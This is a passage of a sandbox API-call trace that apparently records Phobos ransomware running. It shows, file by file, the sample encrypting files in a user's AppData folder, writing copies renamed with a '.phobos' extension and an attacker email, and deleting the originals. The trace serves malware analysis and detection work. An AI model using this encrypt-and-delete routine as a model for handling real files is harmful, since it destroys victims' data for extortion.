pdwDataLen=0x2f4fc48*=0x10ff0, dwBufLen=0x10ff0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x10ff0) returned 1 [0192.890] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x10ff0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x10ff0, lpOverlapped=0x0) returned 1 [0192.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.893] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.893] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.893] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.893] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.893] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.893] CloseHandle (hObject=0x164) returned 1 [0192.894] CloseHandle (hObject=0x134) returned 1 [0192.894] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\clAsttDrcm.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\clasttdrcm.ods")) returned 1 [0192.897] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CQ44PQZH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cq44pqzh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.897] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=41860) returned 1 [0192.897] CloseHandle (hObject=0x134) returned 1 [0192.897] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CQ44PQZH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cq44pqzh.flv")) returned 0x2020 [0192.898] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CQ44PQZH.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cq44pqzh.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CQ44PQZH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cq44pqzh.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0192.898] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.898] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.898] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CQ44PQZH.flv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cq44pqzh.flv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.898] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32a28) returned 1 [0192.898] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.898] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xa384, lpOverlapped=0x0) returned 1 [0192.900] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa390, dwBufLen=0xa390 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xa390) returned 1 [0192.900] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xa390, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xa390, lpOverlapped=0x0) returned 1 [0192.902] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa327e8) returned 1 [0192.902] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0192.902] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0192.902] CryptDestroyKey (hKey=0xa327e8) returned 1 [0192.902] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0192.902] CryptDestroyKey (hKey=0xa32a28) returned 1 [0192.902] CloseHandle (hObject=0x134) returned 1 [0192.902] CloseHandle (hObject=0x164) returned 1 [0192.902] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CQ44PQZH.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cq44pqzh.flv")) returned 1 [0192.903] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0192.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DEYvjqXKC-p5a4h4Ok.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\deyvjqxkc-p5a4h4ok.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.904] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=30226) returned 1 [0192.904] CloseHandle (hObject=0x164) returned 1 [0192.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DEYvjqXKC-p5a4h4Ok.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\deyvjqxkc-p5a4h4ok.avi")) returned 0x2020 [0192.904] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DEYvjqXKC-p5a4h4Ok.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\deyvjqxkc-p5a4h4ok.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0192.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DEYvjqXKC-p5a4h4Ok.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\deyvjqxkc-p5a4h4ok.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0192.904] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.904] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0192.904] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DEYvjqXKC-p5a4h4Ok.avi.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\deyvjqxkc-p5a4h4ok.avi.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.241] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0193.241] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.241] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x7612, lpOverlapped=0x0) returned 1 [0193.248] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7620, dwBufLen=0x7620 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x7620) returned 1 [0193.248] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x7620, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x7620, lpOverlapped=0x0) returned 1 [0193.249] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0193.249] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.249] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0193.249] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.249] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0193.249] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.249] CloseHandle (hObject=0x164) returned 1 [0193.249] CloseHandle (hObject=0x194) returned 1 [0193.249] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\DEYvjqXKC-p5a4h4Ok.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\deyvjqxkc-p5a4h4ok.avi")) returned 1 [0193.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0193.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F9iQBTh6JsYE3NMw8go0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f9iqbth6jsye3nmw8go0.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.252] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=48391) returned 1 [0193.252] CloseHandle (hObject=0x194) returned 1 [0193.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F9iQBTh6JsYE3NMw8go0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f9iqbth6jsye3nmw8go0.mkv")) returned 0x2020 [0193.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F9iQBTh6JsYE3NMw8go0.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f9iqbth6jsye3nmw8go0.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F9iQBTh6JsYE3NMw8go0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f9iqbth6jsye3nmw8go0.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.252] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.252] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F9iQBTh6JsYE3NMw8go0.mkv.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f9iqbth6jsye3nmw8go0.mkv.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.253] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0193.253] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.253] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbd07, lpOverlapped=0x0) returned 1 [0193.254] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbd10, dwBufLen=0xbd10 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbd10) returned 1 [0193.254] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbd10, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbd10, lpOverlapped=0x0) returned 1 [0193.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0193.256] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.256] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60, dwBufLen=0x60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x60) returned 1 [0193.256] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.256] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x112, lpOverlapped=0x0) returned 1 [0193.256] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.256] CloseHandle (hObject=0x194) returned 1 [0193.256] CloseHandle (hObject=0x164) returned 1 [0193.256] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\F9iQBTh6JsYE3NMw8go0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\f9iqbth6jsye3nmw8go0.mkv")) returned 1 [0193.258] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0193.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GB2mGEStAE9dp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gb2mgestae9dp.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.258] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=79118) returned 1 [0193.258] CloseHandle (hObject=0x164) returned 1 [0193.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GB2mGEStAE9dp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gb2mgestae9dp.gif")) returned 0x2020 [0193.258] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GB2mGEStAE9dp.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gb2mgestae9dp.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.258] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GB2mGEStAE9dp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gb2mgestae9dp.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.259] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.259] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.259] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GB2mGEStAE9dp.gif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gb2mgestae9dp.gif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.259] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0193.259] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.259] ReadFile (in: hFile=0x164, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1350e, lpOverlapped=0x0) returned 1 [0193.261] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13510, dwBufLen=0x13510 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x13510) returned 1 [0193.261] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x13510, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x13510, lpOverlapped=0x0) returned 1 [0193.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0193.263] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.263] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0193.263] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.263] WriteFile (in: hFile=0x194, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0193.263] CryptDestroyKey (hKey=0xa32be8) returned 1 [0193.263] CloseHandle (hObject=0x164) returned 1 [0193.263] CloseHandle (hObject=0x194) returned 1 [0193.263] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\GB2mGEStAE9dp.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\gb2mgestae9dp.gif")) returned 1 [0193.265] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0193.265] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HGjGuaMnCM8koFJ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hgjguamncm8kofj.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.266] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=89686) returned 1 [0193.266] CloseHandle (hObject=0x194) returned 1 [0193.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HGjGuaMnCM8koFJ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hgjguamncm8kofj.rtf")) returned 0x2020 [0193.266] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HGjGuaMnCM8koFJ.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hgjguamncm8kofj.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0193.266] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HGjGuaMnCM8koFJ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hgjguamncm8kofj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0193.266] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.267] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0193.267] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\HGjGuaMnCM8koFJ.rtf.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\hgjguamncm8kofj.rtf.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x164 [0193.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32be8) returned 1 [0193.267] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.267] ReadFile (in: hFile=0x194, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x15e56, lpOverlapped=0x0) returned 1 [0193.269] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15e60, dwBufLen=0x15e60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x15e60) returned 1 [0193.270] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x15e60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x15e60, lpOverlapped=0x0) returned 1 [0193.272] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0193.272] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0193.272] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0193.272] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0193.272] WriteFile (in: hFile=0x164, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: 